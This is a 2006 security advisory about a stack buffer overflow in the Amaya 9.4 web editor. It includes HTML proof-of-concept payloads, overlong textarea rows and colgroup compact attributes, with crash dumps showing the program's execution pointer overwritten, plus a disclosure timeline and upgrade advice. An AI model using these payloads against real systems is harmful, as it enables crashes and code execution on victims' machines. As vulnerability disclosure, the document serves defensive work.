-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160
The current release, Amaya 9.5, is available for Linux, Windows and
now Mac OS X (see screenshot). It supports HTML 4.01, XHTML 1.0, XHTML
Basic, XHTML 1.1, HTTP 1.1, MathML 2.0, many CSS 2 features, and
includes SVG support (transformation, transparency, and SMIL animation).
See the "Amaya Overview" page [1] for more details.
Both of the code snippets posted below (in fact there are dozens of
possible snippets, but all of them trigger the same bug) force
Amaya 9.4 to crash; "Ax200" stands for a run of 200 'A' characters:
> <colgroup compact="Ax200">
> [...]
> <textarea rows="Ax200">
At first glance at the generated error report and the disassembly at
the point of the access violation, I thought I had come across a
heap-based buffer overflow.
> eax=000000f9 ebx=02ae8420 ecx=77bcec76 edx=41414141 esi=007b9420
> edi=01ae6d5c eip=004edd95 esp=0012e7ac ebp=007d6110 iopl=0
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
>
> 004edd61 03f3 add esi,ebx
> 004edd63 a4 movsb
> 004edd64 8b4500 mov eax,[ebp]
> 004edd67 8b8c241c010000 mov ecx,[esp+0x11c]
> 004edd6e 8b942418010000 mov edx,[esp+0x118]
> 004edd75 50 push eax
> 004edd76 51 push ecx
> 004edd77 53 push ebx
> 004edd78 52 push edx
> 004edd79 e8a23c0200 call amaya+0x111a20 (00511a20)
> 004edd7e 53 push ebx
> 004edd7f e83cf90000 call amaya+0xfd6c0 (004fd6c0)
> 004edd84 83c428 add esp,0x28
> 004edd87 8bbc24fc000000 mov edi,[esp+0xfc]
> 004edd8e 8b942400010000 mov edx,[esp+0x100]
> FAULT ->004edd95 8b4240 mov eax,[edx+0x40]
> ds:0023:41414181=???
> 004edd98 83f844 cmp eax,0x44
> 004edd9b 0f8527030000 jne amaya+0xee0c8 (004ee0c8)
> 004edda1 837c242457 cmp dword ptr [esp+0x24],0x57
> 004edda6 0f8465060000 je amaya+0xee411 (004ee411)
> 004eddac 8b4500 mov eax,[ebp]
> 004eddaf 8b8c2408010000 mov ecx,[esp+0x108]
> 004eddb6 6aff push 0xff
> 004eddb8 50 push eax
> 004eddb9 51 push ecx
> 004eddba 57 push edi
> 004eddbb e8d33af1ff call amaya+0x1893 (00401893)
> 004eddc0 83c410 add esp,0x10
> 004eddc3 5f pop edi
> 004eddc4 5e pop esi
> 004eddc5 5d pop ebp
After a second, closer look, the supposed heap overflow turned out to
be a stack-based overflow...
We are able to control the EIP:
> <textarea rows=
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB>
> eax=00000001 ebx=00000000 ecx=77c10e72 edx=007bd472
> esi=0000003e edi=00000000 eip=42424242 esp=0012ea38 ebp=00000000
> Function: <nosymbols>
> No prior disassembly possible
> 42424242 ?? ???
> 42424244 ?? ???
> 42424246 ?? ???
> 42424248 ?? ???
> 4242424a ?? ???
> 4242424c ?? ???
Online-demo:
http://morph3us.org/security/pen-testing/amaya/amaya-94-textarea-rows.html
In fact, successful exploitation of this vulnerability is not that easy:
non-text characters are modified during parsing, so you have to find a
place where the shellcode survives untouched. Naturally you also have to
avoid null bytes, because Amaya stops parsing the attribute value at the
first null byte and the overflow would not get triggered.
21 Dec 05 - Vulnerability discovered.
21 Feb 06 - Vendor contacted.
23 Feb 06 - Vendor confirmed vulnerability.
08 Mar 06 - Vendor fixed vulnerability.
12 Apr 06 - Public release.
Upgrade to the latest version of Amaya. [2]
Thomas Waldegger <[email protected]>
BuHa-Security Community - http://buha.info/board/
If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[email protected]' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.
Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.
Advisory online:
http://morph3us.org/advisories/20060412-amaya-94.txt
[1] http://www.w3.org/Amaya/Amaya.html
[2] http://www.w3.org/Amaya/User/BinDist.html
-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/
iD8DBQFEPYALkCo6/ctnOpYRA5yzAJ9j/ki1dPCxPToftjLYHTUkCoGzyACfffaM
zCHSYS6ScvGJcRjuzqovGv4=
=wD6S
-----END PGP SIGNATURE-----